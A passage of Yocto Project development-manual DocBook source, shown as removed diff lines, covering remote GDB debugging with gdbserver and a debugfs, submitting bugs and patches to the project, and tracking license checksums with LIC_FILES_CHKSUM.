- <filename>cross-gdb</filename> you can use for
- debugging during development.
- While this is the quickest approach, the two previous
- methods in this step are better when considering
- long-term maintenance strategies.
- <note>
- If you run
- <filename>bitbake gdb-cross</filename>, the
- OpenEmbedded build system suggests the actual
- image (e.g. <filename>gdb-cross-i586</filename>).
- The suggestion is usually the actual name you want
- to use.
- </note>
- </para></listitem>
- <listitem><para>
- <emphasis>Set up the</emphasis>&nbsp;<filename>debugfs</filename></para>
-
- <para>Run the following commands to set up the
- <filename>debugfs</filename>:
- <literallayout class='monospaced'>
- $ mkdir debugfs
- $ cd debugfs
- $ tar xvfj <replaceable>build-dir</replaceable>/tmp-glibc/deploy/images/<replaceable>machine</replaceable>/<replaceable>image</replaceable>.rootfs.tar.bz2
- $ tar xvfj <replaceable>build-dir</replaceable>/tmp-glibc/deploy/images/<replaceable>machine</replaceable>/<replaceable>image</replaceable>-dbg.rootfs.tar.bz2
- </literallayout>
- </para></listitem>
- <listitem><para>
- <emphasis>Set up GDB</emphasis></para>
-
- <para>Install the SDK (if you built one) and then
- source the correct environment file.
- Sourcing the environment file puts the SDK in your
- <filename>PATH</filename> environment variable.</para>
-
- <para>If you are using the build system, Gdb is
- located in
- <replaceable>build-dir</replaceable>/tmp/sysroots/<replaceable>host</replaceable>/usr/bin/<replaceable>architecture</replaceable>/<replaceable>architecture</replaceable>-gdb
- </para></listitem>
- <listitem><para>
- <emphasis>Boot the target:</emphasis></para>
-
- <para>For information on how to run QEMU, see the
- <ulink url='http://wiki.qemu.org/Documentation/GettingStartedDevelopers'>QEMU Documentation</ulink>.
- <note>
- Be sure to verify that your host can access the
- target via TCP.
- </note>
- </para></listitem>
- <listitem><para>
- <emphasis>Debug a program:</emphasis></para>
-
- <para>Debugging a program involves running gdbserver
- on the target and then running Gdb on the host.
- The example in this step debugs
- <filename>gzip</filename>:
- <literallayout class='monospaced'>
- root@qemux86:~# gdbserver localhost:1234 /bin/gzip —help
- </literallayout>
- For additional gdbserver options, see the
- <ulink url='https://www.gnu.org/software/gdb/documentation/'>GDB Server Documentation</ulink>.
- </para>
-
- <para>After running gdbserver on the target, you need
- to run Gdb on the host and configure it and connect to
- the target.
- Use these commands:
- <literallayout class='monospaced'>
- $ cd <replaceable>directory-holding-the-debugfs-directory</replaceable>
- $ <replaceable>arch</replaceable>-gdb
-
- (gdb) set sysroot debugfs
- (gdb) set substitute-path /usr/src/debug debugfs/usr/src/debug
- (gdb) target remote <replaceable>IP-of-target</replaceable>:1234
- </literallayout>
- At this point, everything should automatically load
- (i.e. matching binaries, symbols and headers).
- <note>
- The Gdb <filename>set</filename> commands in the
- previous example can be placed into the users
- <filename>~/.gdbinit</filename> file.
- Upon starting, Gdb automatically runs whatever
- commands are in that file.
- </note>
- </para></listitem>
- <listitem><para>
- <emphasis>Deploying without a full image
- rebuild:</emphasis></para>
-
- <para>In many cases, during development you want a
- quick method to deploy a new binary to the target and
- debug it, without waiting for a full image build.
- </para>
-
- <para>One approach to solving this situation is to
- just build the component you want to debug.
- Once you have built the component, copy the
- executable directly to both the target and the
- host <filename>debugfs</filename>.</para>
-
- <para>If the binary is processed through the debug
- splitting in OpenEmbedded, you should also
- copy the debug items (i.e. <filename>.debug</filename>
- contents and corresponding
- <filename>/usr/src/debug</filename> files)
- from the work directory.
- Here is an example:
- <literallayout class='monospaced'>
- $ bitbake bash
- $ bitbake -c devshell bash
- $ cd ..
- $ scp packages-split/bash/bin/bash <replaceable>target</replaceable>:/bin/bash
- $ cp -a packages-split/bash-dbg/* <replaceable>path</replaceable>/debugfs
- </literallayout>
- </para></listitem>
- </orderedlist>
- </para>
- </section>
-
- <section id='debugging-with-the-gnu-project-debugger-gdb-on-the-target'>
- <title>Debugging with the GNU Project Debugger (GDB) on the Target</title>
-
- <para>
- The previous section addressed using GDB remotely for debugging
- purposes, which is the most usual case due to the inherent
- hardware limitations on many embedded devices.
- However, debugging in the target hardware itself is also
- possible with more powerful devices.
- This section describes what you need to do in order to support
- using GDB to debug on the target hardware.
- </para>
-
- <para>
- To support this kind of debugging, you need do the following:
- <itemizedlist>
- <listitem><para>
- Ensure that GDB is on the target.
- You can do this by adding "gdb" to
- <ulink url='&YOCTO_DOCS_REF_URL;#var-IMAGE_INSTALL'><filename>IMAGE_INSTALL</filename></ulink>:
- <literallayout class='monospaced'>
- IMAGE_INSTALL_append = " gdb"
- </literallayout>
- Alternatively, you can add "tools-debug" to
- <ulink url='&YOCTO_DOCS_REF_URL;#var-IMAGE_FEATURES'><filename>IMAGE_FEATURES</filename></ulink>:
- <literallayout class='monospaced'>
- IMAGE_FEATURES_append = " tools-debug"
- </literallayout>
- </para></listitem>
- <listitem><para>
- Ensure that debug symbols are present.
- You can make sure these symbols are present by
- installing <filename>-dbg</filename>:
- <literallayout class='monospaced'>
- IMAGE_INSTALL_append = " <replaceable>packagename</replaceable>-dbg"
- </literallayout>
- Alternatively, you can do the following to include all
- the debug symbols:
- <literallayout class='monospaced'>
- IMAGE_FEATURES_append = " dbg-pkgs"
- </literallayout>
- </para></listitem>
- </itemizedlist>
- <note>
- To improve the debug information accuracy, you can reduce
- the level of optimization used by the compiler.
- For example, when adding the following line to your
- <filename>local.conf</filename> file, you will reduce
- optimization from
- <ulink url='&YOCTO_DOCS_REF_URL;#var-FULL_OPTIMIZATION'><filename>FULL_OPTIMIZATION</filename></ulink>
- of "-O2" to
- <ulink url='&YOCTO_DOCS_REF_URL;#var-DEBUG_OPTIMIZATION'><filename>DEBUG_OPTIMIZATION</filename></ulink>
- of "-O -fno-omit-frame-pointer":
- <literallayout class='monospaced'>
- DEBUG_BUILD = "1"
- </literallayout>
- Consider that this will reduce the application's performance
- and is recommended only for debugging purposes.
- </note>
- </para>
- </section>
-
- <section id='dev-other-debugging-others'>
- <title>Other Debugging Tips</title>
-
- <para>
- Here are some other tips that you might find useful:
- <itemizedlist>
- <listitem><para>
- When adding new packages, it is worth watching for
- undesirable items making their way into compiler command
- lines.
- For example, you do not want references to local system
- files like
- <filename>/usr/lib/</filename> or
- <filename>/usr/include/</filename>.
- </para></listitem>
- <listitem><para>
- If you want to remove the <filename>psplash</filename>
- boot splashscreen,
- add <filename>psplash=false</filename> to the kernel
- command line.
- Doing so prevents <filename>psplash</filename> from
- loading and thus allows you to see the console.
- It is also possible to switch out of the splashscreen by
- switching the virtual console (e.g. Fn+Left or Fn+Right
- on a Zaurus).
- </para></listitem>
- <listitem><para>
- Removing
- <ulink url='&YOCTO_DOCS_REF_URL;#var-TMPDIR'><filename>TMPDIR</filename></ulink>
- (usually <filename>tmp/</filename>, within the
- <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>)
- can often fix temporary build issues.
- Removing <filename>TMPDIR</filename> is usually a
- relatively cheap operation, because task output will be
- cached in
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SSTATE_DIR'><filename>SSTATE_DIR</filename></ulink>
- (usually <filename>sstate-cache/</filename>, which is
- also in the Build Directory).
- <note>
- Removing <filename>TMPDIR</filename> might be a
- workaround rather than a fix.
- Consequently, trying to determine the underlying
- cause of an issue before removing the directory is
- a good idea.
- </note>
- </para></listitem>
- <listitem><para>
- Understanding how a feature is used in practice within
- existing recipes can be very helpful.
- It is recommended that you configure some method that
- allows you to quickly search through files.</para>
-
- <para>Using GNU Grep, you can use the following shell
- function to recursively search through common
- recipe-related files, skipping binary files,
- <filename>.git</filename> directories, and the
- Build Directory (assuming its name starts with
- "build"):
- <literallayout class='monospaced'>
- g() {
- grep -Ir \
- --exclude-dir=.git \
- --exclude-dir='build*' \
- --include='*.bb*' \
- --include='*.inc*' \
- --include='*.conf*' \
- --include='*.py*' \
- "$@"
- }
- </literallayout>
- Following are some usage examples:
- <literallayout class='monospaced'>
- $ g FOO # Search recursively for "FOO"
- $ g -i foo # Search recursively for "foo", ignoring case
- $ g -w FOO # Search recursively for "FOO" as a word, ignoring e.g. "FOOBAR"
- </literallayout>
- If figuring out how some feature works requires a lot of
- searching, it might indicate that the documentation
- should be extended or improved.
- In such cases, consider filing a documentation bug using
- the Yocto Project implementation of
- <ulink url='https://bugzilla.yoctoproject.org/'>Bugzilla</ulink>.
- For information on how to submit a bug against
- the Yocto Project, see the Yocto Project Bugzilla
- <ulink url='&YOCTO_WIKI_URL;/wiki/Bugzilla_Configuration_and_Bug_Tracking'>wiki page</ulink>
- and the
- "<link linkend='submitting-a-defect-against-the-yocto-project'>Submitting a Defect Against the Yocto Project</link>"
- section.
- <note>
- The manuals might not be the right place to document
- variables that are purely internal and have a
- limited scope (e.g. internal variables used to
- implement a single <filename>.bbclass</filename>
- file).
- </note>
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
- </section>
-
- <section id='making-changes-to-the-yocto-project'>
- <title>Making Changes to the Yocto Project</title>
-
- <para>
- Because the Yocto Project is an open-source, community-based
- project, you can effect changes to the project.
- This section presents procedures that show you how to submit
- a defect against the project and how to submit a change.
- </para>
-
- <section id='submitting-a-defect-against-the-yocto-project'>
- <title>Submitting a Defect Against the Yocto Project</title>
-
- <para>
- Use the Yocto Project implementation of
- <ulink url='http://www.bugzilla.org/about/'>Bugzilla</ulink>
- to submit a defect (bug) against the Yocto Project.
- For additional information on this implementation of Bugzilla see the
- "<ulink url='&YOCTO_DOCS_REF_URL;#resources-bugtracker'>Yocto Project Bugzilla</ulink>"
- section in the Yocto Project Reference Manual.
- For more detail on any of the following steps, see the Yocto Project
- <ulink url='&YOCTO_WIKI_URL;/wiki/Bugzilla_Configuration_and_Bug_Tracking'>Bugzilla wiki page</ulink>.
- </para>
-
- <para>
- Use the following general steps to submit a bug"
-
- <orderedlist>
- <listitem><para>
- Open the Yocto Project implementation of
- <ulink url='&YOCTO_BUGZILLA_URL;'>Bugzilla</ulink>.
- </para></listitem>
- <listitem><para>
- Click "File a Bug" to enter a new bug.
- </para></listitem>
- <listitem><para>
- Choose the appropriate "Classification", "Product", and
- "Component" for which the bug was found.
- Bugs for the Yocto Project fall into one of several
- classifications, which in turn break down into several
- products and components.
- For example, for a bug against the
- <filename>meta-intel</filename> layer, you would choose
- "Build System, Metadata &amp; Runtime", "BSPs", and
- "bsps-meta-intel", respectively.
- </para></listitem>
- <listitem><para>
- Choose the "Version" of the Yocto Project for which you found
- the bug (e.g. &DISTRO;).
- </para></listitem>
- <listitem><para>
- Determine and select the "Severity" of the bug.
- The severity indicates how the bug impacted your work.
- </para></listitem>
- <listitem><para>
- Choose the "Hardware" that the bug impacts.
- </para></listitem>
- <listitem><para>
- Choose the "Architecture" that the bug impacts.
- </para></listitem>
- <listitem><para>
- Choose a "Documentation change" item for the bug.
- Fixing a bug might or might not affect the Yocto Project
- documentation.
- If you are unsure of the impact to the documentation, select
- "Don't Know".
- </para></listitem>
- <listitem><para>
- Provide a brief "Summary" of the bug.
- Try to limit your summary to just a line or two and be sure
- to capture the essence of the bug.
- </para></listitem>
- <listitem><para>
- Provide a detailed "Description" of the bug.
- You should provide as much detail as you can about the context,
- behavior, output, and so forth that surrounds the bug.
- You can even attach supporting files for output from logs by
- using the "Add an attachment" button.
- </para></listitem>
- <listitem><para>
- Click the "Submit Bug" button submit the bug.
- A new Bugzilla number is assigned to the bug and the defect
- is logged in the bug tracking system.
- </para></listitem>
- </orderedlist>
- Once you file a bug, the bug is processed by the Yocto Project Bug
- Triage Team and further details concerning the bug are assigned
- (e.g. priority and owner).
- You are the "Submitter" of the bug and any further categorization,
- progress, or comments on the bug result in Bugzilla sending you an
- automated email concerning the particular change or progress to the
- bug.
- </para>
- </section>
-
- <section id='how-to-submit-a-change'>
- <title>Submitting a Change to the Yocto Project</title>
-
- <para>
- Contributions to the Yocto Project and OpenEmbedded are very welcome.
- Because the system is extremely configurable and flexible, we recognize
- that developers will want to extend, configure or optimize it for
- their specific uses.
- </para>
-
- <para>
- The Yocto Project uses a mailing list and a patch-based workflow
- that is similar to the Linux kernel but contains important
- differences.
- In general, a mailing list exists through which you can submit
- patches.
- You should send patches to the appropriate mailing list so that they
- can be reviewed and merged by the appropriate maintainer.
- The specific mailing list you need to use depends on the
- location of the code you are changing.
- Each component (e.g. layer) should have a
- <filename>README</filename> file that indicates where to send
- the changes and which process to follow.
- </para>
-
- <para>
- You can send the patch to the mailing list using whichever approach
- you feel comfortable with to generate the patch.
- Once sent, the patch is usually reviewed by the community at large.
- If somebody has concerns with the patch, they will usually voice
- their concern over the mailing list.
- If a patch does not receive any negative reviews, the maintainer of
- the affected layer typically takes the patch, tests it, and then
- based on successful testing, merges the patch.
- </para>
-
- <para id='figuring-out-the-mailing-list-to-use'>
- The "poky" repository, which is the Yocto Project's reference build
- environment, is a hybrid repository that contains several
- individual pieces (e.g. BitBake, Metadata, documentation,
- and so forth) built using the combo-layer tool.
- The upstream location used for submitting changes varies by
- component:
- <itemizedlist>
- <listitem><para>
- <emphasis>Core Metadata:</emphasis>
- Send your patch to the
- <ulink url='http://lists.openembedded.org/mailman/listinfo/openembedded-core'>openembedded-core</ulink>
- mailing list. For example, a change to anything under
- the <filename>meta</filename> or
- <filename>scripts</filename> directories should be sent
- to this mailing list.
- </para></listitem>
- <listitem><para>
- <emphasis>BitBake:</emphasis>
- For changes to BitBake (i.e. anything under the
- <filename>bitbake</filename> directory), send your patch
- to the
- <ulink url='http://lists.openembedded.org/mailman/listinfo/bitbake-devel'>bitbake-devel</ulink>
- mailing list.
- </para></listitem>
- <listitem><para>
- <emphasis>"meta-*" trees:</emphasis>
- These trees contain Metadata.
- Use the
- <ulink url='https://lists.yoctoproject.org/listinfo/poky'>poky</ulink>
- mailing list.
- </para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- For changes to other layers hosted in the Yocto Project source
- repositories (i.e. <filename>yoctoproject.org</filename>), tools,
- and the Yocto Project documentation, use the
- <ulink url='https://lists.yoctoproject.org/listinfo/yocto'>Yocto Project</ulink>
- general mailing list.
- <note>
- Sometimes a layer's documentation specifies to use a
- particular mailing list.
- If so, use that list.
- </note>
- For additional recipes that do not fit into the core Metadata, you
- should determine which layer the recipe should go into and submit
- the change in the manner recommended by the documentation (e.g.
- the <filename>README</filename> file) supplied with the layer.
- If in doubt, please ask on the Yocto general mailing list or on
- the openembedded-devel mailing list.
- </para>
-
- <para>
- You can also push a change upstream and request a maintainer to
- pull the change into the component's upstream repository.
- You do this by pushing to a contribution repository that is upstream.
- See the
- "<ulink url='&YOCTO_DOCS_OM_URL;#gs-git-workflows-and-the-yocto-project'>Git Workflows and the Yocto Project</ulink>"
- section in the Yocto Project Overview and Concepts Manual for additional
- concepts on working in the Yocto Project development environment.
- </para>
-
- <para>
- Two commonly used testing repositories exist for
- OpenEmbedded-Core:
- <itemizedlist>
- <listitem><para>
- <emphasis>"ross/mut" branch:</emphasis>
- The "mut" (master-under-test) tree
- exists in the <filename>poky-contrib</filename> repository
- in the
- <ulink url='&YOCTO_GIT_URL;'>Yocto Project source repositories</ulink>.
- </para></listitem>
- <listitem><para>
- <emphasis>"master-next" branch:</emphasis>
- This branch is part of the main
- "poky" repository in the Yocto Project source repositories.
- </para></listitem>
- </itemizedlist>
- Maintainers use these branches to test submissions prior to merging
- patches.
- Thus, you can get an idea of the status of a patch based on
- whether the patch has been merged into one of these branches.
- <note>
- This system is imperfect and changes can sometimes get lost in the
- flow.
- Asking about the status of a patch or change is reasonable if the
- change has been idle for a while with no feedback.
- The Yocto Project does have plans to use
- <ulink url='https://en.wikipedia.org/wiki/Patchwork_(software)'>Patchwork</ulink>
- to track the status of patches and also to automatically preview
- patches.
- </note>
- </para>
-
- <para>
- The following sections provide procedures for submitting a change.
- </para>
-
- <section id='pushing-a-change-upstream'>
- <title>Using Scripts to Push a Change Upstream and Request a Pull</title>
-
- <para>
- Follow this procedure to push a change to an upstream "contrib"
- Git repository:
- <note>
- You can find general Git information on how to push a change
- upstream in the
- <ulink url='http://git-scm.com/book/en/v2/Distributed-Git-Distributed-Workflows'>Git Community Book</ulink>.
- </note>
- <orderedlist>
- <listitem><para>
- <emphasis>Make Your Changes Locally:</emphasis>
- Make your changes in your local Git repository.
- You should make small, controlled, isolated changes.
- Keeping changes small and isolated aids review,
- makes merging/rebasing easier and keeps the change
- history clean should anyone need to refer to it in
- future.
- </para></listitem>
- <listitem><para>
- <emphasis>Stage Your Changes:</emphasis>
- Stage your changes by using the <filename>git add</filename>
- command on each file you changed.
- </para></listitem>
- <listitem><para id='making-sure-you-have-correct-commit-information'>
- <emphasis>Commit Your Changes:</emphasis>
- Commit the change by using the
- <filename>git commit</filename> command.
- Make sure your commit information follows standards by
- following these accepted conventions:
- <itemizedlist>
- <listitem><para>
- Be sure to include a "Signed-off-by:" line in the
- same style as required by the Linux kernel.
- Adding this line signifies that you, the submitter,
- have agreed to the Developer's Certificate of
- Origin 1.1 as follows:
- <literallayout class='monospaced'>
- Developer's Certificate of Origin 1.1
-
- By making a contribution to this project, I certify that:
-
- (a) The contribution was created in whole or in part by me and I
- have the right to submit it under the open source license
- indicated in the file; or
-
- (b) The contribution is based upon previous work that, to the best
- of my knowledge, is covered under an appropriate open source
- license and I have the right under that license to submit that
- work with modifications, whether created in whole or in part
- by me, under the same open source license (unless I am
- permitted to submit under a different license), as indicated
- in the file; or
-
- (c) The contribution was provided directly to me by some other
- person who certified (a), (b) or (c) and I have not modified
- it.
-
- (d) I understand and agree that this project and the contribution
- are public and that a record of the contribution (including all
- personal information I submit with it, including my sign-off) is
- maintained indefinitely and may be redistributed consistent with
- this project or the open source license(s) involved.
- </literallayout>
- </para></listitem>
- <listitem><para>
- Provide a single-line summary of the change.
- and,
- if more explanation is needed, provide more
- detail in the body of the commit.
- This summary is typically viewable in the
- "shortlist" of changes.
- Thus, providing something short and descriptive
- that gives the reader a summary of the change is
- useful when viewing a list of many commits.
- You should prefix this short description with the
- recipe name (if changing a recipe), or else with
- the short form path to the file being changed.
- </para></listitem>
- <listitem><para>
- For the body of the commit message, provide
- detailed information that describes what you
- changed, why you made the change, and the approach
- you used.
- It might also be helpful if you mention how you
- tested the change.
- Provide as much detail as you can in the body of
- the commit message.
- <note>
- You do not need to provide a more detailed
- explanation of a change if the change is
- minor to the point of the single line
- summary providing all the information.
- </note>
- </para></listitem>
- <listitem><para>
- If the change addresses a specific bug or issue
- that is associated with a bug-tracking ID,
- include a reference to that ID in your detailed
- description.
- For example, the Yocto Project uses a specific
- convention for bug references - any commit that
- addresses a specific bug should use the following
- form for the detailed description.
- Be sure to use the actual bug-tracking ID from
- Bugzilla for
- <replaceable>bug-id</replaceable>:
- <literallayout class='monospaced'>
- Fixes [YOCTO #<replaceable>bug-id</replaceable>]
-
- <replaceable>detailed description of change</replaceable>
- </literallayout>
- </para></listitem>
- </itemizedlist>
- </para></listitem>
- <listitem><para>
- <emphasis>Push Your Commits to a "Contrib" Upstream:</emphasis>
- If you have arranged for permissions to push to an
- upstream contrib repository, push the change to that
- repository:
- <literallayout class='monospaced'>
- $ git push <replaceable>upstream_remote_repo</replaceable> <replaceable>local_branch_name</replaceable>
- </literallayout>
- For example, suppose you have permissions to push into the
- upstream <filename>meta-intel-contrib</filename>
- repository and you are working in a local branch named
- <replaceable>your_name</replaceable><filename>/README</filename>.
- The following command pushes your local commits to the
- <filename>meta-intel-contrib</filename> upstream
- repository and puts the commit in a branch named
- <replaceable>your_name</replaceable><filename>/README</filename>:
- <literallayout class='monospaced'>
- $ git push meta-intel-contrib <replaceable>your_name</replaceable>/README
- </literallayout>
- </para></listitem>
- <listitem><para id='push-determine-who-to-notify'>
- <emphasis>Determine Who to Notify:</emphasis>
- Determine the maintainer or the mailing list
- that you need to notify for the change.</para>
-
- <para>Before submitting any change, you need to be sure
- who the maintainer is or what mailing list that you need
- to notify.
- Use either these methods to find out:
- <itemizedlist>
- <listitem><para>
- <emphasis>Maintenance File:</emphasis>
- Examine the <filename>maintainers.inc</filename>
- file, which is located in the
- <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>
- at
- <filename>meta/conf/distro/include</filename>,
- to see who is responsible for code.
- </para></listitem>
- <listitem><para>
- <emphasis>Search by File:</emphasis>
- Using <ulink url='&YOCTO_DOCS_OM_URL;#git'>Git</ulink>,
- you can enter the following command to bring up a
- short list of all commits against a specific file:
- <literallayout class='monospaced'>
- git shortlog -- <replaceable>filename</replaceable>
- </literallayout>
- Just provide the name of the file for which you
- are interested.
- The information returned is not ordered by history
- but does include a list of everyone who has
- committed grouped by name.
- From the list, you can see who is responsible for
- the bulk of the changes against the file.
- </para></listitem>
- <listitem><para>
- <emphasis>Examine the List of Mailing Lists:</emphasis>
- For a list of the Yocto Project and related mailing
- lists, see the
- "<ulink url='&YOCTO_DOCS_REF_URL;#resources-mailinglist'>Mailing lists</ulink>"
- section in the Yocto Project Reference Manual.
- </para></listitem>
- </itemizedlist>
- </para></listitem>
- <listitem><para>
- <emphasis>Make a Pull Request:</emphasis>
- Notify the maintainer or the mailing list that you have
- pushed a change by making a pull request.</para>
-
- <para>The Yocto Project provides two scripts that
- conveniently let you generate and send pull requests to the
- Yocto Project.
- These scripts are <filename>create-pull-request</filename>
- and <filename>send-pull-request</filename>.
- You can find these scripts in the
- <filename>scripts</filename> directory within the
- <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>
- (e.g. <filename>~/poky/scripts</filename>).
- </para>
-
- <para>Using these scripts correctly formats the requests
- without introducing any whitespace or HTML formatting.
- The maintainer that receives your patches either directly
- or through the mailing list needs to be able to save and
- apply them directly from your emails.
- Using these scripts is the preferred method for sending
- patches.</para>
-
- <para>First, create the pull request.
- For example, the following command runs the script,
- specifies the upstream repository in the contrib directory
- into which you pushed the change, and provides a subject
- line in the created patch files:
- <literallayout class='monospaced'>
- $ ~/poky/scripts/create-pull-request -u meta-intel-contrib -s "Updated Manual Section Reference in README"
- </literallayout>
- Running this script forms
- <filename>*.patch</filename> files in a folder named
- <filename>pull-</filename><replaceable>PID</replaceable>
- in the current directory.
- One of the patch files is a cover letter.</para>
-
- <para>Before running the
- <filename>send-pull-request</filename> script, you must
- edit the cover letter patch to insert information about
- your change.
- After editing the cover letter, send the pull request.
- For example, the following command runs the script and
- specifies the patch directory and email address.
- In this example, the email address is a mailing list:
- <literallayout class='monospaced'>
- $ ~/poky/scripts/send-pull-request -p ~/meta-intel/pull-10565 -t meta-intel@yoctoproject.org
- </literallayout>
- You need to follow the prompts as the script is
- interactive.
- <note>
- For help on using these scripts, simply provide the
- <filename>-h</filename> argument as follows:
- <literallayout class='monospaced'>
- $ poky/scripts/create-pull-request -h
- $ poky/scripts/send-pull-request -h
- </literallayout>
- </note>
- </para></listitem>
- </orderedlist>
- </para>
- </section>
-
- <section id='submitting-a-patch'>
- <title>Using Email to Submit a Patch</title>
-
- <para>
- You can submit patches without using the
- <filename>create-pull-request</filename> and
- <filename>send-pull-request</filename> scripts described in the
- previous section.
- However, keep in mind, the preferred method is to use the scripts.
- </para>
-
- <para>
- Depending on the components changed, you need to submit the email
- to a specific mailing list.
- For some guidance on which mailing list to use, see the
- <link linkend='figuring-out-the-mailing-list-to-use'>list</link>
- at the beginning of this section.
- For a description of all the available mailing lists, see the
- "<ulink url='&YOCTO_DOCS_REF_URL;#resources-mailinglist'>Mailing Lists</ulink>"
- section in the Yocto Project Reference Manual.
- </para>
-
- <para>
- Here is the general procedure on how to submit a patch through
- email without using the scripts:
- <orderedlist>
- <listitem><para>
- <emphasis>Make Your Changes Locally:</emphasis>
- Make your changes in your local Git repository.
- You should make small, controlled, isolated changes.
- Keeping changes small and isolated aids review,
- makes merging/rebasing easier and keeps the change
- history clean should anyone need to refer to it in
- future.
- </para></listitem>
- <listitem><para>
- <emphasis>Stage Your Changes:</emphasis>
- Stage your changes by using the <filename>git add</filename>
- command on each file you changed.
- </para></listitem>
- <listitem><para>
- <emphasis>Commit Your Changes:</emphasis>
- Commit the change by using the
- <filename>git commit --signoff</filename> command.
- Using the <filename>--signoff</filename> option identifies
- you as the person making the change and also satisfies
- the Developer's Certificate of Origin (DCO) shown earlier.
- </para>
-
- <para>When you form a commit, you must follow certain
- standards established by the Yocto Project development
- team.
- See
- <link linkend='making-sure-you-have-correct-commit-information'>Step 3</link>
- in the previous section for information on how to
- provide commit information that meets Yocto Project
- commit message standards.
- </para></listitem>
- <listitem><para>
- <emphasis>Format the Commit:</emphasis>
- Format the commit into an email message.
- To format commits, use the
- <filename>git format-patch</filename> command.
- When you provide the command, you must include a revision
- list or a number of patches as part of the command.
- For example, either of these two commands takes your most
- recent single commit and formats it as an email message in
- the current directory:
- <literallayout class='monospaced'>
- $ git format-patch -1
- </literallayout>
- or
- <literallayout class='monospaced'>
- $ git format-patch HEAD~
- </literallayout></para>
-
- <para>After the command is run, the current directory
- contains a numbered <filename>.patch</filename> file for
- the commit.</para>
-
- <para>If you provide several commits as part of the
- command, the <filename>git format-patch</filename> command
- produces a series of numbered files in the current
- directory – one for each commit.
- If you have more than one patch, you should also use the
- <filename>--cover</filename> option with the command,
- which generates a cover letter as the first "patch" in
- the series.
- You can then edit the cover letter to provide a
- description for the series of patches.
- For information on the
- <filename>git format-patch</filename> command,
- see <filename>GIT_FORMAT_PATCH(1)</filename> displayed
- using the <filename>man git-format-patch</filename>
- command.
- <note>
- If you are or will be a frequent contributor to the
- Yocto Project or to OpenEmbedded, you might consider
- requesting a contrib area and the necessary associated
- rights.
- </note>
- </para></listitem>
- <listitem><para>
- <emphasis>Import the Files Into Your Mail Client:</emphasis>
- Import the files into your mail client by using the
- <filename>git send-email</filename> command.
- <note>
- In order to use <filename>git send-email</filename>,
- you must have the proper Git packages installed on
- your host.
- For Ubuntu, Debian, and Fedora the package is
- <filename>git-email</filename>.
- </note></para>
-
- <para>The <filename>git send-email</filename> command
- sends email by using a local or remote Mail Transport Agent
- (MTA) such as <filename>msmtp</filename>,
- <filename>sendmail</filename>, or through a direct
- <filename>smtp</filename> configuration in your Git
- <filename>~/.gitconfig</filename> file.
- If you are submitting patches through email only, it is
- very important that you submit them without any whitespace
- or HTML formatting that either you or your mailer
- introduces.
- The maintainer that receives your patches needs to be able
- to save and apply them directly from your emails.
- A good way to verify that what you are sending will be
- applicable by the maintainer is to do a dry run and send
- them to yourself and then save and apply them as the
- maintainer would.</para>
-
- <para>The <filename>git send-email</filename> command is
- the preferred method for sending your patches using
- email since there is no risk of compromising whitespace
- in the body of the message, which can occur when you use
- your own mail client.
- The command also has several options that let you
- specify recipients and perform further editing of the
- email message.
- For information on how to use the
- <filename>git send-email</filename> command,
- see <filename>GIT-SEND-EMAIL(1)</filename> displayed using
- the <filename>man git-send-email</filename> command.
- </para></listitem>
- </orderedlist>
- </para>
- </section>
- </section>
- </section>
-
- <section id='working-with-licenses'>
- <title>Working With Licenses</title>
-
- <para>
- As mentioned in the
- "<ulink url='&YOCTO_DOCS_OM_URL;#licensing'>Licensing</ulink>"
- section in the Yocto Project Overview and Concepts Manual,
- open source projects are open to the public and they
- consequently have different licensing structures in place.
- This section describes the mechanism by which the
- <ulink url='&YOCTO_DOCS_REF_URL;#build-system-term'>OpenEmbedded build system</ulink>
- tracks changes to licensing text and covers how to maintain open
- source license compliance during your project's lifecycle.
- The section also describes how to enable commercially licensed
- recipes, which by default are disabled.
- </para>
-
- <section id="usingpoky-configuring-LIC_FILES_CHKSUM">
- <title>Tracking License Changes</title>
-
- <para>
- The license of an upstream project might change in the future.
- In order to prevent these changes going unnoticed, the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-LIC_FILES_CHKSUM'><filename>LIC_FILES_CHKSUM</filename></ulink>
- variable tracks changes to the license text. The checksums are
- validated at the end of the configure step, and if the
- checksums do not match, the build will fail.
- </para>
-
- <section id="usingpoky-specifying-LIC_FILES_CHKSUM">
- <title>Specifying the <filename>LIC_FILES_CHKSUM</filename> Variable</title>
-
- <para>
- The <filename>LIC_FILES_CHKSUM</filename>
- variable contains checksums of the license text in the
- source code for the recipe.
- Following is an example of how to specify
- <filename>LIC_FILES_CHKSUM</filename>:
- <literallayout class='monospaced'>
- LIC_FILES_CHKSUM = "file://COPYING;md5=xxxx \
- file://licfile1.txt;beginline=5;endline=29;md5=yyyy \
- file://licfile2.txt;endline=50;md5=zzzz \
- ..."
- </literallayout>
- <note><title>Notes</title>
- <itemizedlist>
- <listitem><para>
- When using "beginline" and "endline", realize
- that line numbering begins with one and not
- zero.
- Also, the included lines are inclusive (i.e.
- lines five through and including 29 in the
- previous example for
- <filename>licfile1.txt</filename>).
- </para></listitem>
- <listitem><para>
- When a license check fails, the selected license
- text is included as part of the QA message.
- Using this output, you can determine the exact
- start and finish for the needed license text.
- </para></listitem>
- </itemizedlist>
- </note>
- </para>
-
- <para>
- The build system uses the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-S'><filename>S</filename></ulink>
- variable as the default directory when searching files
- listed in <filename>LIC_FILES_CHKSUM</filename>.
- The previous example employs the default directory.
- </para>
-
- <para>
- Consider this next example:
- <literallayout class='monospaced'>
- LIC_FILES_CHKSUM = "file://src/ls.c;beginline=5;endline=16;\
- md5=bb14ed3c4cda583abc85401304b5cd4e"
- LIC_FILES_CHKSUM = "file://${WORKDIR}/license.html;md5=5c94767cedb5d6987c902ac850ded2c6"
- </literallayout>
- </para>
-
- <para>
- The first line locates a file in
- <filename>${S}/src/ls.c</filename> and isolates lines five
- through 16 as license text.
- The second line refers to a file in
- <ulink url='&YOCTO_DOCS_REF_URL;#var-WORKDIR'><filename>WORKDIR</filename></ulink>.
- </para>
-
- <para>
- Note that <filename>LIC_FILES_CHKSUM</filename> variable is
- mandatory for all recipes, unless the
- <filename>LICENSE</filename> variable is set to "CLOSED".
- </para>
- </section>
-
- <section id="usingpoky-LIC_FILES_CHKSUM-explanation-of-syntax">
